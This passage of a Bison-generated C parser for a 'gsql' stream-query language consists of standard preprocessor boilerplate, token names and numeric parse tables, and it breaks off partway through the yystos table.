# define YYSIZE_T size_t
# elif ! defined YYSIZE_T
# include <stddef.h> /* INFRINGES ON USER NAME SPACE */
# define YYSIZE_T size_t
# else
# define YYSIZE_T unsigned int
# endif
#endif
#define YYSIZE_MAXIMUM ((YYSIZE_T) -1)
#ifndef YY_
# if defined YYENABLE_NLS && YYENABLE_NLS
# if ENABLE_NLS
# include <libintl.h> /* INFRINGES ON USER NAME SPACE */
# define YY_(Msgid) dgettext ("bison-runtime", Msgid)
# endif
# endif
# ifndef YY_
# define YY_(Msgid) Msgid
# endif
#endif
#ifndef YY_ATTRIBUTE
# if (defined __GNUC__ \
&& (2 < __GNUC__ || (__GNUC__ == 2 && 96 <= __GNUC_MINOR__))) \
|| defined __SUNPRO_C && 0x5110 <= __SUNPRO_C
# define YY_ATTRIBUTE(Spec) __attribute__(Spec)
# else
# define YY_ATTRIBUTE(Spec) /* empty */
# endif
#endif
#ifndef YY_ATTRIBUTE_PURE
# define YY_ATTRIBUTE_PURE YY_ATTRIBUTE ((__pure__))
#endif
#ifndef YY_ATTRIBUTE_UNUSED
# define YY_ATTRIBUTE_UNUSED YY_ATTRIBUTE ((__unused__))
#endif
#if !defined _Noreturn \
&& (!defined __STDC_VERSION__ || __STDC_VERSION__ < 201112)
# if defined _MSC_VER && 1200 <= _MSC_VER
# define _Noreturn __declspec (noreturn)
# else
# define _Noreturn YY_ATTRIBUTE ((__noreturn__))
# endif
#endif
/* Suppress unused-variable warnings by "using" E. */
#if ! defined lint || defined __GNUC__
# define YYUSE(E) ((void) (E))
#else
# define YYUSE(E) /* empty */
#endif
#if defined __GNUC__ && 407 <= __GNUC__ * 100 + __GNUC_MINOR__
/* Suppress an incorrect diagnostic about yylval being uninitialized. */
# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN \
_Pragma ("GCC diagnostic push") \
_Pragma ("GCC diagnostic ignored \"-Wuninitialized\"")\
_Pragma ("GCC diagnostic ignored \"-Wmaybe-uninitialized\"")
# define YY_IGNORE_MAYBE_UNINITIALIZED_END \
_Pragma ("GCC diagnostic pop")
#else
# define YY_INITIAL_VALUE(Value) Value
#endif
#ifndef YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
# define YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
# define YY_IGNORE_MAYBE_UNINITIALIZED_END
#endif
#ifndef YY_INITIAL_VALUE
# define YY_INITIAL_VALUE(Value) /* Nothing. */
#endif
#if ! defined yyoverflow || YYERROR_VERBOSE
/* The parser invokes alloca or malloc; define the necessary symbols. */
# ifdef YYSTACK_USE_ALLOCA
# if YYSTACK_USE_ALLOCA
# ifdef __GNUC__
# define YYSTACK_ALLOC __builtin_alloca
# elif defined __BUILTIN_VA_ARG_INCR
# include <alloca.h> /* INFRINGES ON USER NAME SPACE */
# elif defined _AIX
# define YYSTACK_ALLOC __alloca
# elif defined _MSC_VER
# include <malloc.h> /* INFRINGES ON USER NAME SPACE */
# define alloca _alloca
# else
# define YYSTACK_ALLOC alloca
# if ! defined _ALLOCA_H && ! defined EXIT_SUCCESS
# include <stdlib.h> /* INFRINGES ON USER NAME SPACE */
/* Use EXIT_SUCCESS as a witness for stdlib.h. */
# ifndef EXIT_SUCCESS
# define EXIT_SUCCESS 0
# endif
# endif
# endif
# endif
# endif
# ifdef YYSTACK_ALLOC
/* Pacify GCC's 'empty if-body' warning. */
# define YYSTACK_FREE(Ptr) do { /* empty */; } while (0)
# ifndef YYSTACK_ALLOC_MAXIMUM
/* The OS might guarantee only one guard page at the bottom of the stack,
and a page size can be as small as 4096 bytes. So we cannot safely
invoke alloca (N) if N exceeds 4096. Use a slightly smaller number
to allow for a few compiler-allocated temporary stack slots. */
# define YYSTACK_ALLOC_MAXIMUM 4032 /* reasonable circa 2006 */
# endif
# else
# define YYSTACK_ALLOC YYMALLOC
# define YYSTACK_FREE YYFREE
# ifndef YYSTACK_ALLOC_MAXIMUM
# define YYSTACK_ALLOC_MAXIMUM YYSIZE_MAXIMUM
# endif
# if (defined __cplusplus && ! defined EXIT_SUCCESS \
&& ! ((defined YYMALLOC || defined malloc) \
&& (defined YYFREE || defined free)))
# include <stdlib.h> /* INFRINGES ON USER NAME SPACE */
# ifndef EXIT_SUCCESS
# define EXIT_SUCCESS 0
# endif
# endif
# ifndef YYMALLOC
# define YYMALLOC malloc
# if ! defined malloc && ! defined EXIT_SUCCESS
void *malloc (YYSIZE_T); /* INFRINGES ON USER NAME SPACE */
# endif
# endif
# ifndef YYFREE
# define YYFREE free
# if ! defined free && ! defined EXIT_SUCCESS
void free (void *); /* INFRINGES ON USER NAME SPACE */
# endif
# endif
# endif
#endif /* ! defined yyoverflow || YYERROR_VERBOSE */
#if (! defined yyoverflow \
&& (! defined __cplusplus \
|| (defined YYSTYPE_IS_TRIVIAL && YYSTYPE_IS_TRIVIAL)))
/* A type that is properly aligned for any stack member. */
union yyalloc
{
yytype_int16 yyss_alloc;
YYSTYPE yyvs_alloc;
};
/* The size of the maximum gap between one aligned stack and the next. */
# define YYSTACK_GAP_MAXIMUM (sizeof (union yyalloc) - 1)
/* The size of an array large to enough to hold all stacks, each with
N elements. */
# define YYSTACK_BYTES(N) \
((N) * (sizeof (yytype_int16) + sizeof (YYSTYPE)) \
+ YYSTACK_GAP_MAXIMUM)
# define YYCOPY_NEEDED 1
/* Relocate STACK from its old location to the new one. The
local variables YYSIZE and YYSTACKSIZE give the old and new number of
elements in the stack, and YYPTR gives the new location of the
stack. Advance YYPTR to a properly aligned location for the next
stack. */
# define YYSTACK_RELOCATE(Stack_alloc, Stack) \
do \
{ \
YYSIZE_T yynewbytes; \
YYCOPY (&yyptr->Stack_alloc, Stack, yysize); \
Stack = &yyptr->Stack_alloc; \
yynewbytes = yystacksize * sizeof (*Stack) + YYSTACK_GAP_MAXIMUM; \
yyptr += yynewbytes / sizeof (*yyptr); \
} \
while (0)
#endif
#if defined YYCOPY_NEEDED && YYCOPY_NEEDED
/* Copy COUNT objects from SRC to DST. The source and destination do
not overlap. */
# ifndef YYCOPY
# if defined __GNUC__ && 1 < __GNUC__
# define YYCOPY(Dst, Src, Count) \
__builtin_memcpy (Dst, Src, (Count) * sizeof (*(Src)))
# else
# define YYCOPY(Dst, Src, Count) \
do \
{ \
YYSIZE_T yyi; \
for (yyi = 0; yyi < (Count); yyi++) \
(Dst)[yyi] = (Src)[yyi]; \
} \
while (0)
# endif
# endif
#endif /* !YYCOPY_NEEDED */
/* YYFINAL -- State number of the termination state. */
#define YYFINAL 60
/* YYLAST -- Last index in YYTABLE. */
#define YYLAST 738
/* YYNTOKENS -- Number of terminals. */
#define YYNTOKENS 82
/* YYNNTS -- Number of nonterminals. */
#define YYNNTS 60
/* YYNRULES -- Number of rules. */
#define YYNRULES 183
/* YYNSTATES -- Number of states. */
#define YYNSTATES 390
/* YYTRANSLATE[YYX] -- Symbol number corresponding to YYX as returned
by yylex, with out-of-bounds checking. */
#define YYUNDEFTOK 2
#define YYMAXUTOK 317
#define YYTRANSLATE(YYX) \
((unsigned int) (YYX) <= YYMAXUTOK ? yytranslate[YYX] : YYUNDEFTOK)
/* YYTRANSLATE[TOKEN-NUM] -- Symbol number corresponding to TOKEN-NUM
as returned by yylex, without out-of-bounds checking. */
static const yytype_uint8 yytranslate[] =
{
0, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 76, 2, 79, 78, 19, 13, 2,
70, 72, 17, 15, 71, 16, 73, 18, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 81, 2,
2, 2, 2, 2, 80, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 74, 2, 75, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 12, 2, 77, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 2, 2, 2, 2,
2, 2, 2, 2, 2, 2, 1, 2, 3, 4,
5, 6, 7, 8, 9, 10, 11, 14, 20, 21,
22, 23, 24, 25, 26, 27, 28, 29, 30, 31,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41,
42, 43, 44, 45, 46, 47, 48, 49, 50, 51,
52, 53, 54, 55, 56, 57, 58, 59, 60, 61,
62, 63, 64, 65, 66, 67, 68, 69
};
#if YYDEBUG
/* YYRLINE[YYN] -- Source line where rule number YYN was defined. */
static const yytype_uint16 yyrline[] =
{
0, 206, 206, 211, 218, 232, 237, 242, 247, 251,
254, 259, 264, 268, 272, 275, 280, 285, 289, 293,
298, 299, 303, 304, 308, 309, 313, 314, 318, 319,
323, 327, 329, 334, 342, 346, 358, 359, 360, 361,
362, 363, 364, 368, 369, 373, 374, 378, 379, 380,
381, 382, 386, 387, 392, 393, 397, 401, 402, 406,
407, 411, 412, 416, 417, 421, 428, 429, 430, 431,
432, 436, 437, 438, 439, 443, 447, 451, 452, 458,
459, 460, 461, 462, 463, 464, 465, 466, 467, 468,
469, 470, 471, 472, 473, 474, 475, 476, 477, 478,
479, 480, 481, 482, 487, 488, 489, 490, 494, 495,
499, 500, 501, 502, 503, 504, 505, 506, 507, 508,
509, 510, 516, 517, 521, 522, 526, 527, 531, 532,
533, 534, 538, 539, 543, 544, 548, 549, 550, 551,
562, 563, 567, 568, 569, 573, 574, 578, 582, 583,
598, 599, 602, 604, 606, 608, 612, 613, 617, 621,
622, 626, 629, 630, 634, 635, 639, 640, 644, 645,
646, 647, 648, 649, 650, 651, 655, 656, 660, 661,
665, 666, 670, 671
};
#endif
#if YYDEBUG || YYERROR_VERBOSE || 0
/* YYTNAME[SYMBOL-NUM] -- String name of the symbol SYMBOL-NUM.
First, the terminals, then, starting at YYNTOKENS, nonterminals. */
static const char *const yytname[] =
{
"$end", "error", "$undefined", "NAME", "STRING_TOKEN", "INTNUM",
"LONGINTNUM", "APPROXNUM", "OR", "AND", "NOT", "COMPARISON", "'|'",
"'&'", "SHIFT_OP", "'+'", "'-'", "'*'", "'/'", "'%'", "UMINUS",
"SEMICOLON", "LEFTBRACE", "RIGHTBRACE", "BY", "AS", "AGGR", "FROM",
"INNER_JOIN", "FILTER_JOIN", "OUTER_JOIN", "LEFT_OUTER_JOIN",
"RIGHT_OUTER_JOIN", "WATCHLIST_JOIN", "GROUP", "HAVING", "IN", "SELECT",
"WATCHLIST", "WHERE", "SUPERGROUP", "CLEANING_WHEN", "CLEANING_BY",
"CLOSING_WHEN", "SUCH", "THAT", "CUBE", "ROLLUP", "GROUPING_SETS",
"TRUE_V", "FALSE_V", "TIMEVAL_L", "HEX_L", "LHEX_L", "IP_L", "IPV6_L",
"MERGE", "SLACK", "DEFINE_SEC", "PARAM_SEC", "PROTOCOL", "TABLE",
"STREAM", "FTA", "UNPACK_FCNS", "OPERATOR", "OPERATOR_VIEW", "FIELDS",
"SUBQUERIES", "SELECTION_PUSHDOWN", "'('", "','", "')'", "'.'", "'['",
"']'", "'!'", "'~'", "'$'", "'#'", "'@'", "':'", "$accept",
"parse_result", "gsql", "query_list", "params_def", "variable_def",
"variable_list", "variable_assign", "select_statement",
"merge_statement", "watchlist_statement", "selection", "table_exp",
"from_clause", "table_ref_commalist", "table_ref", "table", "qname",
"opt_where_clause", "where_clause", "opt_cleaning_when_clause",
"opt_cleaning_by_clause", "opt_closing_when_clause", "opt_having_clause",
"having_clause", "search_condition", "predicate", "comparison_predicate",
"in_predicate", "literal_commalist", "scalar_exp", "select_commalist",
"scalar_exp_commalist", "literal", "opt_group_by_clause",
"opt_supergroup_clause", "list_of_gb_commalist", "extended_gb",
"extended_gb_commalist", "gb_commalist", "gb", "ifparam", "column_ref",
"column_ref_list", "gb_ref", "gb_ref_list", "table_list", "table_def",
"unpack_func_list", "unpack_func", "subqueryspec_list", "subq_spec",
"field_list", "field", "opt_param_commalist", "param_commalist",
"opt_singleparam_commalist_bkt", "opt_singleparam_commalist",
"singleparam_commalist", "namevec_commalist", YY_NULLPTR
};
#endif
# ifdef YYPRINT
/* YYTOKNUM[NUM] -- (External) token number corresponding to the
(internal) symbol number NUM (which must be that of a token). */
static const yytype_uint16 yytoknum[] =
{
0, 256, 257, 258, 259, 260, 261, 262, 263, 264,
265, 266, 124, 38, 267, 43, 45, 42, 47, 37,
268, 269, 270, 271, 272, 273, 274, 275, 276, 277,
278, 279, 280, 281, 282, 283, 284, 285, 286, 287,
288, 289, 290, 291, 292, 293, 294, 295, 296, 297,
298, 299, 300, 301, 302, 303, 304, 305, 306, 307,
308, 309, 310, 311, 312, 313, 314, 315, 316, 317,
40, 44, 41, 46, 91, 93, 33, 126, 36, 35,
64, 58
};
# endif
#define YYPACT_NINF -290
#define yypact_value_is_default(Yystate) \
(!!((Yystate) == (-290)))
#define YYTABLE_NINF -145
#define yytable_value_is_error(Yytable_value) \
0
/* YYPACT[STATE-NUM] -- Index in YYTABLE of the portion describing
STATE-NUM. */
static const yytype_int16 yypact[] =
{
87, 519, -34, 49, 60, 70, 66, 108, 104, 112,
137, 161, -290, 157, 16, 98, -290, -290, -290, 277,
-290, 45, -290, -290, -290, -290, 519, 519, -12, -290,
-290, 184, 198, 220, 256, 295, 519, 519, 519, 196,
226, 308, 500, 315, 265, -290, -290, -290, 320, 280,
285, 141, 20, 28, 306, -290, 6, 277, 374, 358,
-290, -10, 92, -290, -290, -290, 92, -290, -290, -290,
-290, 228, 13, 311, -290, -290, 309, 312, -290, -290,
-290, -290, -290, 356, -290, -290, -290, -290, -290, 17,
351, 313, 357, 370, 371, 372, -290, 361, 519, 519,
519, 519, 519, 519, 519, 519, 398, 519, 404, 405,
49, 519, 49, -290, 152, -290, 44, -290, -290, 119,
406, 336, 409, 419, 401, 121, 421, 116, -290, 362,
-290, -290, -290, -290, -290, -290, -290, -290, 719, 170,
353, 426, 341, 359, 446, 399, -290, 360, 366, 427,
369, -290, 429, 424, 17, 49, 17, 17, 17, 17,
431, 410, -290, 618, 481, 176, 209, 209, -290, -290,
-290, -290, 674, 440, 181, -290, -290, 652, -290, 434,
435, -290, -290, -290, 252, 192, 419, 423, -290, -290,
213, 404, 443, 462, 374, -290, 306, 519, -290, 465,
-290, -290, 215, -290, -290, 400, 644, 467, 468, 412,
17, -290, 369, 402, 369, 369, 369, 369, 188, 431,
431, 260, -290, -290, -290, 234, 450, 448, 486, 26,
-290, -290, -290, -290, -290, -290, -290, -290, 501, -290,
-41, 404, 502, -290, 197, -290, -290, -290, 439, 719,
-290, -290, -290, -290, 441, 424, 442, 444, -290, 507,
487, -290, 36, 602, 431, 431, 519, 445, 160, 513,
485, -290, 306, 522, 268, -290, 200, -290, -290, 499,
108, 108, 108, 472, -290, -16, -290, 545, -290, 719,
35, 534, 488, 490, 491, 688, -290, 484, -290, -290,
504, 505, 431, 515, -290, 336, -290, -290, -290, -290,
-290, 404, 424, 424, 424, 550, -290, 146, -290, 15,
575, 575, 514, 580, 160, 513, 513, 260, 431, 543,
565, 202, 17, 35, -290, 276, 225, -290, 231, 575,
238, -290, -290, -290, -290, 260, 431, 544, -290, 520,
369, -290, 589, 575, -290, -290, 246, 523, -290, 260,
431, -290, 572, 705, -290, -290, 575, 260, 597, 250,
532, 195, -290, -290, 600, 597, 536, 603, 279, -290,
306, 306, 605, -290, 586, -290, 607, -290, 306, -290
};
/* YYDEFACT[STATE-NUM] -- Default reduction number in state STATE-NUM.
Performed when YYTABLE does not specify something else to do. Zero
means the default is an error. */
static const yytype_uint8 yydefact[] =
{
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 20, 2, 0, 0, 9, 14, 19, 3,
150, 142, 110, 111, 112, 113, 0, 0, 0, 114,
115, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 104, 34, 91, 93, 94, 0, 142,
0, 0, 0, 0, 166, 52, 178, 0, 0, 0,
1, 0, 0, 7, 12, 17, 0, 8, 13, 18,
151, 0, 0, 0, 87, 88, 0, 0, 116, 117,
118, 119, 120, 0, 89, 90, 92, 121, 140, 0,
0, 0, 0, 0, 0, 0, 30, 54, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 31, 0, 25, 0, 26, 23, 0,
0, 176, 0, 0, 0, 0, 0, 0, 156, 0,
21, 6, 11, 16, 5, 10, 15, 99, 108, 0,
143, 0, 0, 0, 0, 0, 95, 52, 0, 0,
36, 43, 45, 47, 0, 0, 0, 0, 0, 0,
0, 122, 55, 81, 84, 86, 79, 80, 82, 83,
85, 105, 106, 0, 0, 162, 145, 0, 146, 0,
0, 24, 27, 22, 168, 0, 0, 0, 53, 180,
0, 0, 0, 0, 0, 155, 166, 0, 98, 0,
141, 103, 0, 96, 97, 0, 0, 0, 0, 0,
0, 46, 37, 0, 38, 40, 39, 41, 142, 0,
0, 56, 70, 71, 72, 0, 0, 124, 0, 166,
33, 163, 32, 29, 28, 169, 170, 171, 0, 167,
0, 0, 0, 179, 0, 4, 158, 157, 0, 109,
144, 102, 100, 101, 52, 48, 0, 0, 44, 0,
0, 68, 0, 0, 0, 0, 0, 0, 0, 0,
63, 107, 166, 0, 172, 177, 0, 181, 153, 0,
0, 0, 0, 0, 73, 0, 69, 66, 67, 75,
0, 136, 0, 0, 0, 0, 132, 123, 128, 147,
0, 125, 0, 57, 64, 176, 165, 173, 174, 175,
152, 0, 49, 50, 51, 0, 74, 0, 77, 0,
0, 0, 0, 0, 0, 0, 0, 65, 0, 59,
0, 0, 0, 0, 76, 137, 0, 134, 0, 0,
0, 139, 133, 148, 149, 58, 0, 61, 164, 0,
42, 78, 0, 0, 130, 129, 0, 0, 131, 60,
0, 35, 0, 138, 135, 126, 0, 62, 0, 0,
0, 0, 159, 127, 0, 0, 0, 0, 0, 160,
166, 166, 0, 161, 0, 182, 0, 154, 166, 183
};
/* YYPGOTO[NTERM-NUM]. */
static const yytype_int16 yypgoto[] =
{
-290, -290, -42, -290, 596, 608, 570, -48, 47, 50,
65, -290, -290, -49, -150, 430, -290, -6, -290, -290,
-290, -290, -290, -290, -290, -208, -290, -290, -290, -290,
-1, -290, -128, -273, -290, -290, -290, 317, -290, -289,
-246, -290, 7, -290, 29, -290, 582, -4, -290, 449,
-290, 267, -178, -171, -191, -290, 339, -290, 460, -290
};
/* YYDEFGOTO[NTERM-NUM]. */
static const yytype_int16 yydefgoto[] =
{
-1, 11, 12, 13, 14, 15, 116, 117, 16, 17,
18, 42, 96, 97, 150, 151, 152, 153, 161, 162,
329, 347, 361, 303, 304, 221, 222, 223, 224, 317,
225, 44, 139, 45, 227, 270, 340, 296, 297, 336,
337, 46, 47, 51, 300, 301, 19, 20, 127, 128,
371, 372, 174, 175, 121, 185, 187, 124, 190, 378
};
/* YYTABLE[YYPACT[STATE-NUM]] -- What to do in state STATE-NUM. If
positive, shift that token. If negative, reduce the rule whose
number is the opposite. If YYTABLE_NINF, syntax error. */
static const yytype_int16 yytable[] =
{
43, 56, 113, 231, 212, 248, 214, 215, 216, 217,
50, 261, 262, 244, 202, 70, 140, 318, 335, 130,
147, 148, 298, 114, 122, 74, 75, 1, 2, 272,
242, 114, 338, 48, 275, 83, 84, 85, 273, 22,
23, 24, 25, 115, 264, 265, 3, 114, 4, 5,
356, 118, 49, 1, 2, 197, 287, 288, 76, 316,
351, 63, 67, 276, 64, 68, 77, 181, 182, 54,
138, 182, 3, 231, 4, 144, 123, 369, 298, 65,
69, 305, 52, 192, 29, 30, 31, 32, 33, 34,
35, 149, 53, 141, 327, 141, 120, 163, 164, 165,
166, 167, 168, 169, 170, 231, 172, 364, 286, 131,
177, 55, 132, 134, 40, 71, 135, 176, 72, 178,
345, 70, 114, 73, 1, 2, 57, 133, 232, 1,
2, 136, 285, 331, 58, 1, 2, 194, 359, 195,
59, 138, 183, 3, 206, 4, 5, 6, 3, 7,
8, 9, 367, 10, 3, 179, 180, 5, 1, 2,
231, 60, 213, 291, 22, 23, 24, 25, 89, 90,
91, 92, 93, 94, 95, 26, 27, 3, 61, 4,
5, 6, 350, 7, 173, 9, 28, 10, 78, 384,
385, 101, 102, 103, 104, 105, 249, 389, 111, 86,
173, 255, 79, 173, 230, 173, 292, 293, 294, 29,
30, 31, 32, 33, 34, 35, 375, 333, 376, 263,
278, 334, 112, 310, 80, 349, 103, 104, 105, 87,
36, 21, 22, 23, 24, 25, 37, 38, 39, 40,
41, 197, 198, 26, 27, 266, 98, 99, 100, 101,
102, 103, 104, 105, 28, 235, 236, 237, 71, 138,
81, 72, 260, 238, 239, 289, 73, 295, 264, 265,
267, 307, 308, 309, 312, 313, 314, 29, 30, 31,
32, 33, 34, 35, 242, 243, 197, 251, -143, -143,
-143, -143, -143, -143, -143, -143, 353, 354, 36, 82,
137, -143, 353, 355, 37, 38, 39, 40, 41, 357,
358, 88, 21, 22, 23, 24, 25, 353, 365, 295,
295, 353, 373, 295, 26, 27, 143, 98, 99, 100,
101, 102, 103, 104, 105, 28, 107, 6, 295, 7,
106, 9, 108, 10, 21, 22, 23, 24, 25, 352,
382, 383, 295, 109, 343, 344, 26, 27, 29, 30,
31, 32, 33, 34, 35, 295, 110, 28, 98, 99,
100, 101, 102, 103, 104, 105, 120, 126, 154, 36,
129, 142, 145, 155, 156, 37, 38, 39, 40, 41,
29, 30, 31, 32, 33, 34, 35, 157, 158, 159,
160, 171, 21, 22, 23, 24, 25, 173, 140, 184,
186, 36, 188, 201, 26, 27, 205, 37, 38, 39,
40, 41, 189, 191, 193, 28, 199, 196, 146, 200,
209, 203, 211, 207, 218, 22, 23, 24, 25, 208,
210, 219, 122, 229, 226, 241, 26, 27, 29, 30,
31, 32, 33, 34, 35, 233, 234, 28, 98, 99,
100, 101, 102, 103, 104, 105, 245, 246, 250, 36,
254, 256, 252, 259, 268, 37, 38, 39, 40, 41,
29, 30, 31, 32, 33, 34, 35, 257, 269, 271,
21, 22, 23, 24, 25, 100, 101, 102, 103, 104,
105, 220, 26, 27, 274, 277, 279, 37, 38, 39,
40, 41, 283, 28, 280, 281, 299, 282, 204, 290,
302, 311, 21, 22, 23, 24, 25, 89, 90, 91,
92, 93, 94, 95, 26, 27, 29, 30, 31, 32,
33, 34, 35, 306, 315, 28, -142, -142, -142, -142,
-142, -142, -142, -142, 265, 324, 328, 36, 320, -142,
321, 322, 284, 37, 38, 39, 40, 41, 29, 30,
31, 32, 33, 34, 35, 325, 326, 332, 291, 22,
23, 24, 25, 341, 339, 346, 348, 360, 362, 36,
26, 27, 363, 366, 368, 37, 38, 39, 40, 41,
370, 28, 374, 377, 71, 380, 381, 319, 386, 387,
388, 66, 73, 266, 98, 99, 100, 101, 102, 103,
104, 105, 62, 119, 29, 30, 31, 32, 33, 34,
35, 99, 100, 101, 102, 103, 104, 105, 267, 125,
258, 342, 379, 247, 330, 36, 240, 0, 0, 0,
0, 37, 38, 39, 40, 41, 98, 99, 100, 101,
102, 103, 104, 105, 98, 99, 100, 101, 102, 103,
104, 105, 0, 0, 146, 0, 0, 0, 0, 89,
90, 91, 92, 93, 94, 95, 98, 99, 100, 101,
102, 103, 104, 105, 0, 0, 0, 0, 0, 228,
98, 99, 100, 101, 102, 103, 104, 105, 0, 0,
0, 0, 0, 323, 0, 0, 253, -144, -144, -144,
-144, -144, -144, -144, -144, 0, 0, 0, 0, 0,
-144, 98, 99, 100, 101, 102, 103, 104, 105
};
static const yytype_int16 yycheck[] =
{
1, 7, 51, 174, 154, 196, 156, 157, 158, 159,
3, 219, 220, 191, 142, 19, 3, 290, 3, 61,
3, 4, 268, 3, 18, 26, 27, 37, 38, 3,
71, 3, 321, 67, 75, 36, 37, 38, 229, 4,
5, 6, 7, 23, 8, 9, 56, 3, 58, 59,
339, 23, 3, 37, 38, 71, 264, 265, 70, 75,
333, 14, 15, 241, 14, 15, 78, 23, 116, 3,
71, 119, 56, 244, 58, 76, 70, 366, 324, 14,
15, 272, 22, 125, 49, 50, 51, 52, 53, 54,
55, 74, 22, 80, 302, 80, 70, 98, 99, 100,
101, 102, 103, 104, 105, 276, 107, 353, 72, 62,
111, 3, 62, 66, 79, 70, 66, 110, 73, 112,
328, 125, 3, 78, 37, 38, 22, 62, 177, 37,
38, 66, 260, 311, 22, 37, 38, 21, 346, 23,
3, 142, 23, 56, 145, 58, 59, 60, 56, 62,
63, 64, 360, 66, 56, 3, 4, 59, 37, 38,
331, 0, 155, 3, 4, 5, 6, 7, 27, 28,
29, 30, 31, 32, 33, 15, 16, 56, 21, 58,
59, 60, 332, 62, 3, 64, 26, 66, 4, 380,
381, 15, 16, 17, 18, 19, 197, 388, 57, 3,
3, 207, 4, 3, 23, 3, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 21, 71, 23, 220,
23, 75, 81, 23, 4, 23, 17, 18, 19, 3,
70, 3, 4, 5, 6, 7, 76, 77, 78, 79,
80, 71, 72, 15, 16, 11, 12, 13, 14, 15,
16, 17, 18, 19, 26, 3, 4, 5, 70, 260,
4, 73, 74, 71, 72, 266, 78, 268, 8, 9,
36, 3, 4, 5, 280, 281, 282, 49, 50, 51,
52, 53, 54, 55, 71, 72, 71, 72, 12, 13,
14, 15, 16, 17, 18, 19, 71, 72, 70, 4,
72, 25, 71, 72, 76, 77, 78, 79, 80, 71,
72, 3, 3, 4, 5, 6, 7, 71, 72, 320,
321, 71, 72, 324, 15, 16, 17, 12, 13, 14,
15, 16, 17, 18, 19, 26, 71, 60, 339, 62,
25, 64, 22, 66, 3, 4, 5, 6, 7, 73,
71, 72, 353, 73, 325, 326, 15, 16, 49, 50,
51, 52, 53, 54, 55, 366, 81, 26, 12, 13,
14, 15, 16, 17, 18, 19, 70, 3, 27, 70,
22, 70, 70, 70, 27, 76, 77, 78, 79, 80,
49, 50, 51, 52, 53, 54, 55, 27, 27, 27,
39, 3, 3, 4, 5, 6, 7, 3, 3, 3,
74, 70, 3, 72, 15, 16, 17, 76, 77, 78,
79, 80, 3, 22, 3, 26, 73, 65, 72, 3,
3, 72, 3, 73, 3, 4, 5, 6, 7, 73,
71, 10, 18, 3, 34, 22, 15, 16, 49, 50,
51, 52, 53, 54, 55, 21, 21, 26, 12, 13,
14, 15, 16, 17, 18, 19, 23, 5, 3, 70,
3, 3, 72, 71, 24, 76, 77, 78, 79, 80,
49, 50, 51, 52, 53, 54, 55, 75, 40, 3,
3, 4, 5, 6, 7, 14, 15, 16, 17, 18,
19, 70, 15, 16, 3, 3, 67, 76, 77, 78,
79, 80, 5, 26, 73, 73, 3, 73, 72, 74,
35, 22, 3, 4, 5, 6, 7, 27, 28, 29,
30, 31, 32, 33, 15, 16, 49, 50, 51, 52,
53, 54, 55, 21, 72, 26, 12, 13, 14, 15,
16, 17, 18, 19, 9, 71, 41, 70, 70, 25,
70, 70, 75, 76, 77, 78, 79, 80, 49, 50,
51, 52, 53, 54, 55, 71, 71, 27, 3, 4,
5, 6, 7, 3, 70, 42, 21, 43, 68, 70,
15, 16, 3, 70, 22, 76, 77, 78, 79, 80,
3, 26, 70, 3, 70, 69, 3, 73, 3, 23,
3, 15, 78, 11, 12, 13, 14, 15, 16, 17,
18, 19, 14, 53, 49, 50, 51, 52, 53, 54,
55, 13, 14, 15, 16, 17, 18, 19, 36, 57,
210, 324, 375, 194, 305, 70, 186, -1, -1, -1,
-1, 76, 77, 78, 79, 80, 12, 13, 14, 15,
16, 17, 18, 19, 12, 13, 14, 15, 16, 17,
18, 19, -1, -1, 72, -1, -1, -1, -1, 27,
28, 29, 30, 31, 32, 33, 12, 13, 14, 15,
16, 17, 18, 19, -1, -1, -1, -1, -1, 25,
12, 13, 14, 15, 16, 17, 18, 19, -1, -1,
-1, -1, -1, 25, -1, -1, 72, 12, 13, 14,
15, 16, 17, 18, 19, -1, -1, -1, -1, -1,
25, 12, 13, 14, 15, 16, 17, 18, 19
};
/* YYSTOS[STATE-NUM] -- The (internal number of the) accessing
symbol of state STATE-NUM. */
/* Bison-generated table (from fta.y): used by the debug trace and by
   error reporting to recover which grammar symbol a state was reached
   on.  Do not edit by hand -- regenerate from the grammar. */
static const yytype_uint8 yystos[] =
{
0, 37, 38, 56, 58, 59, 60, 62, 63, 64,
66, 83, 84, 85, 86, 87, 90, 91, 92, 128,
129, 3, 4, 5, 6, 7, 15, 16, 26, 49,
50, 51, 52, 53, 54, 55, 70, 76, 77, 78,
79, 80, 93, 112, 113, 115, 123, 124, 67, 3,
124, 125, 22, 22, 3, 3, 99, 22, 22, 3,
0, 21, 87, 90, 91, 92, 86, 90, 91, 92,
129, 70, 73, 78, 112, 112, 70, 78, 4, 4,
4, 4, 4, 112, 112, 112, 3, 3, 3, 27,
28, 29, 30, 31, 32, 33, 94, 95, 12, 13,
14, 15, 16, 17, 18, 19, 25, 71, 22, 73,
81, 57, 81, 95, 3, 23, 88, 89, 23, 88,
70, 136, 18, 70, 139, 128, 3, 130, 131, 22,
84, 90, 91, 92, 90, 91, 92, 72, 112, 114,
